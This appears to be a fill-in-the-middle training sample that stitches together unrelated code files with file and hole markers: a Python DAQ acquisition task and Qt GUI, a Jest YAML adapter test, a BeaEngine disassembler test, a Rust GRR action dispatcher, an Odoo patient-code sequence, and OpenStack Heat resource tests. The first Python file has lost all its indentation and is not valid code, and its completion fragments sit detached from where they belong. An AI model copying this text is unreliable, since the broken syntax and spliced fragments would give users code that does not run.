def getChanScale(self, chan):
with self._DGLock:
## Scale defaults to 1.0
## - can be overridden in configuration
return self._DGConfig[chan].get('scale', 1.0)
def getChanOffset(self, chan):
with self._DGLock:
## Offset defaults to 0.0
## - can be overridden in configuration
return self._DGConfig[chan].get('offset', 0.0)
def getChanUnits(self, ch):
with self._DGLock:
if 'units' in self._DGConfig[ch]:
return self._DGConfig[ch]['units']
else:
return None
def isOutput(self, chan):
with self._DGLock:
return self._DGConfig[chan]['type'][1] == 'o'
def listChannels(self):
with self._DGLock:
return dict([(ch, self._DGConfig[ch].copy()) for ch in self._DGConfig])
class DAQGenericTask(DeviceTask):
def __init__(self, dev, cmd, parentTask):
DeviceTask.__init__(self, dev, cmd, parentTask)
self.daqTasks = {}
self.initialState = {}
self._DAQCmd = cmd
## Stores the list of channels that will generate or acquire buffered samples
self.bufferedChannels = []
def getConfigOrder(self):
"""return lists of devices that should be configured (before, after) this device"""
daqs = set([self.dev.getDAQName(ch) for ch in self._DAQCmd])
return [], list(daqs) ## this device should be configured before its DAQs
def configure(self):
## Record initial state or set initial value
## NOTE:
## Subclasses should call this function only _after_ making any changes that will affect the mapping between
## physical values and channel voltages.
prof = Profiler('DAQGenericTask.configure', disabled=True)
# self.daqTasks = {}
self.mapping = self.dev.getMapping(chans=list(
self._DAQCmd.keys())) ## remember the mapping so we can properly translate data after it has been returned
self.initialState = {}
self.holdingVals = {}
for ch in self._DAQCmd:
# dev = self.dev.dm.getDevice(self.dev._DGConfig[ch]['channel'][0])
dev = self.dev.dm.getDevice(self.dev.getDAQName(ch))
prof.mark(ch + ' get dev')
if 'preset' in self._DAQCmd[ch]:
with self.dev._DGLock:
daqChan = self.dev._DGConfig[ch]['channel']
# dev.setChannelValue(self.dev._DGConfig[ch]['channel'][1], self._DAQCmd[ch]['preset'])
preVal = self.mapping.mapToDaq(ch, self._DAQCmd[ch]['preset'])
dev.setChannelValue(daqChan, preVal)
prof.mark(ch + ' preset')
elif 'holding' in self._DAQCmd[ch]:
self.dev.setChanHolding(ch, self._DAQCmd[ch]['holding'])
prof.mark(ch + ' set holding')
if 'recordInit' in self._DAQCmd[ch] and self._DAQCmd[ch]['recordInit']:
self.initialState[ch] = self.dev.getChannelValue(ch)
prof.mark(ch + ' record init')
for ch in self.dev._DGConfig:
## record current holding value for all output channels (even those that were not buffered for this task)
with self.dev._DGLock:
chanType = self.dev._DGConfig[ch]['type']
if chanType in ['ao', 'do']:
self.holdingVals[ch] = self.dev.getChanHolding(ch)
prof.mark(ch + ' record holding')
prof.finish()
def createChannels(self, daqTask):
self.daqTasks = {}
# print "createChannels"
## Is this the correct DAQ device for any of my channels?
## create needed channels + info
## write waveform to command channel if needed
chans = self.dev.listChannels()
for ch in chans:
# print " creating channel %s.." % ch
if ch not in self._DAQCmd:
# print " ignoring channel", ch, "not in command"
continue
chConf = chans[ch]
if chConf['device'] != daqTask.devName():
# print " ignoring channel", ch, "wrong device"
continue
## Input channels are only used if the command has record: True
if chConf['type'] in ['ai', 'di']:
# if ('record' not in self._DAQCmd[ch]) or (not self._DAQCmd[ch]['record']):
if not self._DAQCmd[ch].get('record', False):
# print " ignoring channel", ch, "recording disabled"
continue
## Output channels are only added if they have a command waveform specified
elif chConf['type'] in ['ao', 'do']:
if 'command' not in self._DAQCmd[ch]:
# print " ignoring channel", ch, "no command"
continue
self.bufferedChannels.append(ch)
            # _DAQCmd[ch]['task'] = daqTask  ## also, don't forget to delete it later
if chConf['type'] in ['ao', 'do']:
# scale = self.getChanScale(ch)
cmdData = self._DAQCmd[ch]['command']
if cmdData is None:
# print "No command for channel %s, skipping." % ch
continue
# cmdData = cmdData * scale
## apply scale, offset or inversion for output lines
cmdData = self.mapping.mapToDaq(ch, cmdData)
# print "channel", chConf['channel'][1], cmdData
if chConf['type'] == 'do':
cmdData = cmdData.astype(np.uint32)
cmdData[cmdData <= 0] = 0
cmdData[cmdData > 0] = 0xFFFFFFFF
# print "channel", self._DAQCmd[ch]
# print "LOW LEVEL:", self._DAQCmd[ch].get('lowLevelConf', {})
daqTask.addChannel(chConf['channel'], chConf['type'], **self._DAQCmd[ch].get('lowLevelConf', {}))
self.daqTasks[ch] = daqTask ## remember task so we can stop it later on
daqTask.setWaveform(chConf['channel'], cmdData)
# print "DO task %s has type" % ch, cmdData.dtype
elif chConf['type'] == 'ai':
mode = chConf.get('mode', None)
# if len(chConf['channel']) > 2:
# mode = chConf['channel'][2]
# print "Adding channel %s to DAQ task" % chConf['channel'][1]
daqTask.addChannel(chConf['channel'], chConf['type'], mode=mode,
**self._DAQCmd[ch].get('lowLevelConf', {}))
self.daqTasks[ch] = daqTask ## remember task so we can stop it later on
elif chConf['type'] == 'di':
daqTask.addChannel(chConf['channel'], chConf['type'], **self._DAQCmd[ch].get('lowLevelConf', {}))
self.daqTasks[ch] = daqTask ## remember task so we can stop it later on
def getChanUnits(self, chan):
if 'units' in self._DAQCmd[chan]:
return self._DAQCmd[chan]['units']
else:
return self.dev.getChanUnits(chan)
def start(self):
## possibly nothing required here, DAQ will start recording without our help.
pass
def isDone(self):
## DAQ task handles this for us.
return True
def stop(self, abort=False):
# with self.dev._DGLock: ##not necessary
## Stop DAQ tasks before setting holding level.
# print "STOP"
prof = Profiler(disabled=True)
for ch in self.daqTasks:
# print "Stop task", self.daqTasks[ch]
try:
self.daqTasks[ch].stop(abort=abort)
except:
printExc("Error while stopping DAQ task:")
prof('stop %s' % ch)
for ch in self._DAQCmd:
if 'holding' in self._DAQCmd[ch]:
self.dev.setChanHolding(ch, self._DAQCmd[ch]['holding'])
prof('set holding %s' % ch)
elif self.dev.isOutput(ch): ## return all output channels to holding value
self.dev.setChanHolding(ch)
prof('reset to holding %s' % ch)
def getResult(self):
## Access data recorded from DAQ task
## create MetaArray and fill with MC state info
## Collect data and info for each channel in the command
result = {}
for ch in self.bufferedChannels:
result[ch] = self.daqTasks[ch].getData(self.dev._DGConfig[ch]['channel'])
result[ch]['data'] = self.mapping.mapFromDaq(ch, result[ch]['data']) ## scale/offset/invert
result[ch]['units'] = self.getChanUnits(ch)
if len(result) > 0:
meta = result[list(result.keys())[0]]['info']
rate = meta['rate']
nPts = meta['numPts']
## Create an array of time values
timeVals = np.linspace(0, float(nPts - 1) / float(rate), nPts)
## Concatenate all channels together into a single array, generate MetaArray info
chanList = [np.atleast_2d(result[x]['data']) for x in result]
cols = [(x, result[x]['units']) for x in result]
# print cols
try:
arr = np.concatenate(chanList)
except:
print(chanList)
print([a.shape for a in chanList])
raise
daqState = OrderedDict()
for ch in self.dev._DGConfig:
if ch in result:
daqState[ch] = result[ch]['info']
else:
daqState[ch] = {}
## record current holding value for all output channels (even those that were not buffered for this task)
if self.dev._DGConfig[ch]['type'] in ['ao', 'do']:
daqState[ch]['holding'] = self.holdingVals[ch]
info = [axis(name='Channel', cols=cols), axis(name='Time', units='s', values=timeVals)] + [
{'DAQ': daqState}]
protInfo = self._DAQCmd.copy() ## copy everything but the command arrays and low-level configuration info
for ch in protInfo:
protInfo[ch].pop('command', None)
protInfo[ch].pop('lowLevelConf', None)
info[-1]['Protocol'] = protInfo
marr = MetaArray(arr, info=info)
return marr
else:
return None
def storeResult(self, dirHandle):
DeviceTask.storeResult(self, dirHandle)
for ch in self._DAQCmd:
if self._DAQCmd[ch].get('recordInit', False):
# if 'recordInit' in self._DAQCmd[ch] and self._DAQCmd[ch]['recordInit']:
dirHandle.setInfo({(self.dev.name(), ch): self.initialState[ch]})
class DAQDevGui(Qt.QWidget):
def __init__(self, dev):
self.dev = dev
Qt.QWidget.__init__(self)
self.layout = Qt.QVBoxLayout()
self.setLayout(self.layout)
chans = self.dev.listChannels()
self.widgets = {}
# self.uis = {}
self.defaults = {}
for ch in chans:
wid = Qt.QWidget()
ui = Ui_Form()
ui.setupUi(wid)
self.layout.addWidget(wid)
ui.analogCtrls = [ui.scaleDefaultBtn, ui.scaleSpin, ui.offsetDefaultBtn, ui.offsetSpin, ui.scaleLabel,
ui.offsetLabel]
# ui.channel = ch
for s in dir(ui):
i = getattr(ui, s)
if isinstance(i, Qt.QWidget):
i.channel = ch
self.widgets[ch] = ui
ui.nameLabel.setText(str(ch))
ui.channelCombo.addItem("%s (%s)" % (ch, chans[ch]['channel']))
holding = chans[ch].get('holding', 0)
if chans[ch]['type'] in ['ao', 'ai']:
ui.inputRadio.setEnabled(False)
ui.outputRadio.setEnabled(False)
ui.invertCheck.hide()
scale = chans[ch].get('scale', 1)
units = chans[ch].get('units', 'V')
offset = chans[ch].get('offset', 0)
ui.offsetSpin.setOpts(suffix='V', siPrefix=True, dec=True, step=1.0, minStep=1e-4)
ui.offsetSpin.setValue(offset)
ui.offsetSpin.sigValueChanged.connect(self.offsetSpinChanged)
ui.offsetDefaultBtn.setText("Default (%s)" % siFormat(offset, suffix='V'))
ui.offsetDefaultBtn.clicked.connect(self.offsetDefaultBtnClicked)
if chans[ch]['type'] == 'ao':
ui.outputRadio.setChecked(True)
ui.scaleDefaultBtn.setText("Default (%s)" % siFormat(scale, suffix='V/' + units))
ui.scaleSpin.setOpts(suffix='V/' + units, siPrefix=True, dec=True, step=1.0, minStep=1e-9)
ui.holdingSpin.setOpts(suffix=units, siPrefix=True, step=0.01)
ui.holdingSpin.setValue(holding)
ui.holdingSpin.sigValueChanged.connect(self.holdingSpinChanged)
elif chans[ch]['type'] == 'ai':
ui.inputRadio.setChecked(True)
ui.holdingLabel.hide()
ui.holdingSpin.hide()
ui.scaleDefaultBtn.setText("Default (%s)" % siFormat(scale, suffix=units + '/V'))
# ui.scaleDefaultBtn.clicked.connect(self.scaleDefaultBtnClicked)
ui.scaleSpin.setOpts(suffix=units + '/V', siPrefix=True, dec=True)
ui.scaleSpin.setValue(scale)
ui.scaleDefaultBtn.clicked.connect(self.scaleDefaultBtnClicked)
ui.scaleSpin.sigValueChanged.connect(self.scaleSpinChanged)
self.defaults[ch] = {
'scale': scale,
'offset': offset}
elif chans[ch]['type'] in ['do', 'di']:
for item in ui.analogCtrls:
item.hide()
if chans[ch].get('invert', False):
ui.invertCheck.setChecked(True)
if chans[ch]['type'] == 'do':
ui.outputRadio.setChecked(True)
ui.holdingSpin.setOpts(bounds=[0, 1], step=1)
ui.holdingSpin.setValue(holding)
ui.holdingSpin.sigValueChanged.connect(self.holdingSpinChanged)
elif chans[ch]['type'] == 'di':
ui.inputRadio.setChecked(True)
ui.holdingLabel.hide()
ui.holdingSpin.hide()
ui.invertCheck.toggled.connect(self.invertToggled)
# Qt.QObject.connect(self.dev, Qt.SIGNAL('holdingChanged'), self.holdingChanged)
self.dev.sigHoldingChanged.connect(self.holdingChanged)
def holdingChanged(self, ch, val):
self.widgets[ch].holdingSpin.blockSignals(True)
self.widgets[ch].holdingSpin.setValue(val)
self.widgets[ch].holdingSpin.blockSignals(False)
def holdingSpinChanged(self, spin):
ch = spin.channel
self.dev.setChanHolding(ch, spin.value(), block=False)
def scaleSpinChanged(self, spin):
ch = spin.channel
self.dev.setChanScale(ch, spin.value(), block=False)
def offsetSpinChanged(self, spin):
ch = spin.channel
self.dev.setChanOffset(ch, spin.value(), block=False)
def offsetDefaultBtnClicked(self):
ch = self.sender().channel
self.widgets[ch].offsetSpin.setValue(self.defaults[ch]['offset'])
def scaleDefaultBtnClicked(self):
ch = self.sender().channel
self.widgets[ch].scaleSpin.setValue(self.defaults[ch]['scale'])
def invertToggled(self, b):
ch = self.sender().channel
if b:
self.dev.setChanScale(ch, -1, update=False)
self.dev.setChanOffset(ch, 1)
else:
self.dev.setChanScale(ch, 1, update=False)
self.dev.setChanOffset(ch, 0)<|fim▁end|>
|
chans = [chans]
for ch in chans:
|
<|file_name|>yml-test.js<|end_file_name|><|fim▁begin|>/**
* Copyright IBM Corp. 2020, 2020
*
* This source code is licensed under the Apache-2.0 license found in the
* LICENSE file in the root directory of this source tree.
*
* @jest-environment node
*/
'use strict';
describe('yml', () => {
let vol;
let adapter;
beforeEach(() => {
jest.mock('fs', () => {
const memfs = require('memfs');
vol = memfs.vol;
return memfs.fs;
});
adapter = require('../yml');
});
afterEach(() => {
vol.reset();
});
it('should read a filepath and return its content as a value', async () => {
const data = { foo: 'bar' };
vol.fromJSON({
'/test.yml': adapter.serialize(data),
});
const result = await adapter.read('/', 'test');
expect(result).toEqual(data);
});
it('should write the given data as yml to the given filepath', async () => {
const data = { foo: 'bar' };
await adapter.write('/', 'test', data);
const result = await adapter.read('/', 'test');
expect(result).toEqual(data);
});
  it('should throw if the file it is trying to read from does not exist', async () => {
await expect(
adapter.read('/', 'test')
).rejects.toThrowErrorMatchingInlineSnapshot(
`"Unable to find extension \`test\` at filepath: /test.yml. Either create the file or update the extension to be computed."`
);
});<|fim▁hole|> it('should throw if the given data is invalid yml', async () => {
await expect(
adapter.write('/', 'test', { data: undefined })
).rejects.toThrow();
});
});<|fim▁end|>
| |
<|file_name|>0f3a25.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
# @author : beaengine@gmail.com
from headers.BeaEnginePython import *
from nose.tools import *
class TestSuite:
def test(self):
# EVEX.256.66.0F3A.W0 25 /r ib
# vpternlogd ymm1{k1}{z}, ymm2, ymm3/m256/m32bcst, imm8
myEVEX = EVEX('EVEX.256.66.0F3A.W0')
Buffer = bytes.fromhex('{}252011'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0x25)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpternlogd')
assert_equal(myDisasm.repr(), 'vpternlogd ymm28, ymm16, ymmword ptr [r8], 11h')
# EVEX.512.66.0F3A.W0 25 /r ib
# vpternlogd zmm1{k1}{z}, zmm2, zmm3/m512/m32bcst, imm8
myEVEX = EVEX('EVEX.512.66.0F3A.W0')
Buffer = bytes.fromhex('{}252011'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0x25)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpternlogd')
assert_equal(myDisasm.repr(), 'vpternlogd zmm28, zmm16, zmmword ptr [r8], 11h')
# EVEX.256.66.0F3A.W1 25 /r ib
# vpternlogq ymm1{k1}{z}, ymm2, ymm3/m256/m64bcst, imm8
myEVEX = EVEX('EVEX.256.66.0F3A.W1')
Buffer = bytes.fromhex('{}252011'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0x25)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpternlogq')
assert_equal(myDisasm.repr(), 'vpternlogq ymm28, ymm16, ymmword ptr [r8], 11h')
# EVEX.512.66.0F3A.W1 25 /r ib
# vpternlogq zmm1{k1}{z}, zmm2, zmm3/m512/m64bcst, imm8
myEVEX = EVEX('EVEX.512.66.0F3A.W1')
Buffer = bytes.fromhex('{}252011'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0x25)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpternlogq')<|fim▁hole|><|fim▁end|>
|
assert_equal(myDisasm.repr(), 'vpternlogq zmm28, zmm16, zmmword ptr [r8], 11h')
|
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright 2020 Google LLC
//
// Use of this source code is governed by an MIT-style license that can be found
// in the LICENSE file or at https://opensource.org/licenses/MIT.
//! Handlers and types for agent's actions.
//!
//! The basic functionality that a GRR agent exposes is called an _action_.
//! Actions are invoked by the server (when running a _flow_), should gather
//! requested information and report back to the server.
//!
//! In RRG each action consists of three components: a request type, a response
//! type and an action handler. Request and response types wrap lower-level
//! Protocol Buffer messages sent by and to the GRR server. Handlers accept one
//! instance of the corresponding request type and send some (zero or more)
//! instances of the corresponding response type.
#[cfg(target_os = "linux")]
pub mod filesystems;
#[cfg(target_family = "unix")]
pub mod interfaces;
pub mod metadata;
pub mod startup;
pub mod listdir;
pub mod timeline;
pub mod network;<|fim▁hole|>pub mod memsize;
pub mod finder;
use crate::session::{self, Session, Task};
/// Abstraction for action-specific requests.
///
/// Protocol Buffer messages received from the GRR server are not necessarily
/// easy to work with and are hardly idiomatic to Rust. For this reason, actions
/// should define more structured data types to represent their input and should
/// be able to parse raw messages into them.
pub trait Request: Sized {
/// A type of the corresponding raw proto message.
type Proto: prost::Message + Default;
/// A method for converting raw proto messages into structured requests.
fn from_proto(proto: Self::Proto) -> Result<Self, session::ParseError>;
}
/// Abstraction for action-specific responses.
///
/// Like with the [`Request`] type, Protocol Buffer messages sent to the GRR
/// server are not very idiomatic to Rust. For this reason, actions should define
/// more structured data types to represent responses and provide a way to
/// convert them into the wire format.
///
/// Note that because of the design flaws in the protocol, actions also need to
/// specify a name of the wrapper RDF class from the Python implementation.
/// Hopefully, one day this issue would be fixed and class names will not leak
/// into the specification.
///
/// [`Request`]: trait.Request.html
pub trait Response: Sized {
/// A name of the corresponding RDF class.
const RDF_NAME: Option<&'static str>;
/// A type of the corresponding raw proto message.
type Proto: prost::Message + Default;
/// A method for converting structured responses into raw proto messages.
fn into_proto(self) -> Self::Proto;
}
impl Request for () {
type Proto = ();
fn from_proto(unit: ()) -> Result<(), session::ParseError> {
Ok(unit)
}
}
impl Response for () {
const RDF_NAME: Option<&'static str> = None;
type Proto = ();
fn into_proto(self) {
}
}
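// A minimal illustrative handler (hypothetical, not one of the real actions
// dispatched below), shown only to tie the two traits together: it accepts
// the unit request and emits a single unit response.
//
//     fn handle<S: Session>(session: &mut S, _request: ()) -> session::Result<()> {
//         session.reply(())
//     }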
/// Dispatches `task` to a handler appropriate for the given `action`.
///
/// This method is a mapping between action names (as specified in the protocol)
/// and action handlers (implemented on the agent).
///
/// If the given action is unknown (or not yet implemented), this function will
/// return an error.
pub fn dispatch<'s, S>(action: &str, task: Task<'s, S>) -> session::Result<()>
where
S: Session,
{
match action {
"SendStartupInfo" => task.execute(self::startup::handle),
"GetClientInfo" => task.execute(self::metadata::handle),
"ListDirectory" => task.execute(self::listdir::handle),
"Timeline" => task.execute(self::timeline::handle),
"ListNetworkConnections" => task.execute(self::network::handle),
"GetFileStat" => task.execute(self::stat::handle),
"GetInstallDate" => task.execute(self::insttime::handle),
#[cfg(target_family = "unix")]
"EnumerateInterfaces" => task.execute(self::interfaces::handle),
#[cfg(target_os = "linux")]
"EnumerateFilesystems" => task.execute(self::filesystems::handle),
"GetMemorySize" => task.execute(self::memsize::handle),
action => return Err(session::Error::Dispatch(String::from(action))),
}
}<|fim▁end|>
|
pub mod stat;
pub mod insttime;
|
<|file_name|>clv_patient_category_seq.py<|end_file_name|><|fim▁begin|># -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from openerp import models, fields, api
def format_code(code_seq):
code = map(int, str(code_seq))
code_len = len(code)
while len(code) < 14:
code.insert(0, 0)
while len(code) < 16:
n = sum([(len(code) + 1 - i) * v for i, v in enumerate(code)]) % 11
if n > 1:
f = 11 - n
else:
f = 0
code.append(f)
code_str = "%s.%s.%s.%s.%s-%s" % (str(code[0]) + str(code[1]),
str(code[2]) + str(code[3]) + str(code[4]),
str(code[5]) + str(code[6]) + str(code[7]),
str(code[8]) + str(code[9]) + str(code[10]),
str(code[11]) + str(code[12]) + str(code[13]),
str(code[14]) + str(code[15]))
if code_len <= 3:
code_form = code_str[18 - code_len:21]
elif code_len > 3 and code_len <= 6:
code_form = code_str[17 - code_len:21]
elif code_len > 6 and code_len <= 9:
code_form = code_str[16 - code_len:21]
elif code_len > 9 and code_len <= 12:<|fim▁hole|> code_form = code_str[15 - code_len:21]
elif code_len > 12 and code_len <= 14:
code_form = code_str[14 - code_len:21]
return code_form
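# Illustrative example (worked through the padding and mod-11 check-digit
# logic above): a sequence value of 1 is zero-padded to 14 digits, the two
# check digits 9 and 1 are appended, and the formatted string is trimmed to
# its significant tail:
#
#   format_code(1)  # -> '1-91'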
class clv_patient_category(models.Model):
_inherit = 'clv_patient.category'
code = fields.Char('Category Code', size=64, select=1, required=False, readonly=False, default='/',
help='Use "/" to get an automatic new Category Code.')
@api.model
def create(self, vals):
if not 'code' in vals or ('code' in vals and vals['code'] == '/'):
code_seq = self.pool.get('ir.sequence').get(self._cr, self._uid, 'clv_patient.category.code')
vals['code'] = format_code(code_seq)
return super(clv_patient_category, self).create(vals)
@api.multi
def write(self, vals):
if 'code' in vals and vals['code'] == '/':
code_seq = self.pool.get('ir.sequence').get(self._cr, self._uid, 'clv_patient.category.code')
vals['code'] = format_code(code_seq)
return super(clv_patient_category, self).write(vals)
@api.one
def copy(self, default=None):
default = dict(default or {})
default.update({'code': '/',})
return super(clv_patient_category, self).copy(default)<|fim▁end|>
| |
<|file_name|>test_stack_resources.py<|end_file_name|><|fim▁begin|># Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from oslo_messaging.rpc import dispatcher
import six
from heat.common import exception
from heat.common import identifier
from heat.engine.clients.os import keystone
from heat.engine import dependencies
from heat.engine import resource as res
from heat.engine import service
from heat.engine import stack
from heat.engine import stack_lock
from heat.engine import template as templatem
from heat.objects import stack as stack_object
from heat.tests import common
from heat.tests.engine import tools
from heat.tests import fakes as test_fakes
from heat.tests import generic_resource as generic_rsrc
from heat.tests import utils
policy_template = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "alarming",
"Resources" : {
"WebServerScaleDownPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : "",
"Cooldown" : "60",
"ScalingAdjustment" : "-1"
}
},
"Random" : {
"Type" : "OS::Heat::RandomString"
}
}
}
'''
class StackResourcesServiceTest(common.HeatTestCase):
def setUp(self):
super(StackResourcesServiceTest, self).setUp()
self.ctx = utils.dummy_context(tenant_id='stack_resource_test_tenant')
self.eng = service.EngineService('a-host', 'a-topic')
self.eng.thread_group_mgr = tools.DummyThreadGroupManager()
self.eng.engine_id = 'engine-fake-uuid'
cfg.CONF.set_default('heat_stack_user_role', 'stack_user_role')
@mock.patch.object(stack.Stack, 'load')
def _test_describe_stack_resource(self, mock_load):
mock_load.return_value = self.stack
# Patch _resolve_all_attributes or it tries to call novaclient
self.patchobject(res.Resource, '_resolve_all_attributes',
return_value=None)
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertIn('resource_identity', r)
self.assertIn('description', r)
self.assertIn('updated_time', r)
self.assertIn('stack_identity', r)
self.assertIsNotNone(r['stack_identity'])
self.assertIn('stack_name', r)
self.assertEqual(self.stack.name, r['stack_name'])
self.assertIn('metadata', r)
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertIn('resource_type', r)
self.assertIn('physical_resource_id', r)
self.assertIn('resource_name', r)
self.assertIn('attributes', r)
self.assertEqual('WebServer', r['resource_name'])
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY)
@tools.stack_context('service_stack_resource_describe__test_stack')
def test_stack_resource_describe(self):
self._test_describe_stack_resource()
@mock.patch.object(service.EngineService, '_get_stack')
def test_stack_resource_describe_nonexist_stack(self, mock_get):
non_exist_identifier = identifier.HeatIdentifier(
self.ctx.tenant_id, 'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
mock_get.side_effect = exception.EntityNotFound(
entity='Stack', name='test')
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resource,
self.ctx, non_exist_identifier, 'WebServer')
self.assertEqual(exception.EntityNotFound, ex.exc_info[0])
mock_get.assert_called_once_with(self.ctx, non_exist_identifier)
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resource_describe_nonexist_test_stack')
def test_stack_resource_describe_nonexist_resource(self, mock_load):
mock_load.return_value = self.stack
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resource,
self.ctx, self.stack.identifier(), 'foo')
self.assertEqual(exception.ResourceNotFound, ex.exc_info[0])
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY)
@tools.stack_context('service_resource_describe_noncreated_test_stack',
create_res=False)
def test_stack_resource_describe_noncreated_resource(self):
self._test_describe_stack_resource()
@mock.patch.object(service.EngineService, '_authorize_stack_user')
@tools.stack_context('service_resource_describe_user_deny_test_stack')
def test_stack_resource_describe_stack_user_deny(self, mock_auth):
self.ctx.roles = [cfg.CONF.heat_stack_user_role]
mock_auth.return_value = False
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resource,
self.ctx, self.stack.identifier(), 'foo')
self.assertEqual(exception.Forbidden, ex.exc_info[0])
mock_auth.assert_called_once_with(self.ctx, mock.ANY, 'foo')
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_describe_test_stack')
def test_stack_resources_describe(self, mock_load):
mock_load.return_value = self.stack
resources = self.eng.describe_stack_resources(self.ctx,
self.stack.identifier(),
'WebServer')
self.assertEqual(1, len(resources))
r = resources[0]
self.assertIn('resource_identity', r)
self.assertIn('description', r)
self.assertIn('updated_time', r)
self.assertIn('stack_identity', r)
self.assertIsNotNone(r['stack_identity'])
self.assertIn('stack_name', r)
self.assertEqual(self.stack.name, r['stack_name'])
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertIn('resource_type', r)
self.assertIn('physical_resource_id', r)
self.assertIn('resource_name', r)
self.assertEqual('WebServer', r['resource_name'])
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY)
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_describe_no_filter_test_stack')
def test_stack_resources_describe_no_filter(self, mock_load):
mock_load.return_value = self.stack
resources = self.eng.describe_stack_resources(
self.ctx, self.stack.identifier(), None)
self.assertEqual(1, len(resources))
r = resources[0]
self.assertIn('resource_name', r)
self.assertEqual('WebServer', r['resource_name'])
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY)
@mock.patch.object(service.EngineService, '_get_stack')
def test_stack_resources_describe_bad_lookup(self, mock_get):
mock_get.side_effect = TypeError
self.assertRaises(TypeError,
self.eng.describe_stack_resources,
self.ctx, None, 'WebServer')
mock_get.assert_called_once_with(self.ctx, None)
def test_stack_resources_describe_nonexist_stack(self):
non_exist_identifier = identifier.HeatIdentifier(
self.ctx.tenant_id, 'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resources,
self.ctx, non_exist_identifier, 'WebServer')
self.assertEqual(exception.EntityNotFound, ex.exc_info[0])
@tools.stack_context('find_phys_res_stack')
def test_find_physical_resource(self):
resources = self.eng.describe_stack_resources(self.ctx,
self.stack.identifier(),
None)
phys_id = resources[0]['physical_resource_id']
result = self.eng.find_physical_resource(self.ctx, phys_id)
self.assertIsInstance(result, dict)
resource_identity = identifier.ResourceIdentifier(**result)
self.assertEqual(self.stack.identifier(), resource_identity.stack())
self.assertEqual('WebServer', resource_identity.resource_name)
def test_find_physical_resource_nonexist(self):
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.find_physical_resource,
self.ctx, 'foo')
self.assertEqual(exception.EntityNotFound, ex.exc_info[0])
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack')
def test_stack_resources_list(self, mock_load):
mock_load.return_value = self.stack
resources = self.eng.list_stack_resources(self.ctx,
self.stack.identifier())
self.assertEqual(1, len(resources))
r = resources[0]
self.assertIn('resource_identity', r)
self.assertIn('updated_time', r)
self.assertIn('physical_resource_id', r)
self.assertIn('resource_name', r)
self.assertEqual('WebServer', r['resource_name'])
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertIn('resource_type', r)
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY)
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack_with_depth')
def test_stack_resources_list_with_depth(self, mock_load):
mock_load.return_value = self.stack
resources = six.itervalues(self.stack)
self.stack.iter_resources = mock.Mock(return_value=resources)
self.eng.list_stack_resources(self.ctx,
self.stack.identifier(),
2)
self.stack.iter_resources.assert_called_once_with(2,
filters=None)
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack_with_max_depth')
def test_stack_resources_list_with_max_depth(self, mock_load):
mock_load.return_value = self.stack
resources = six.itervalues(self.stack)
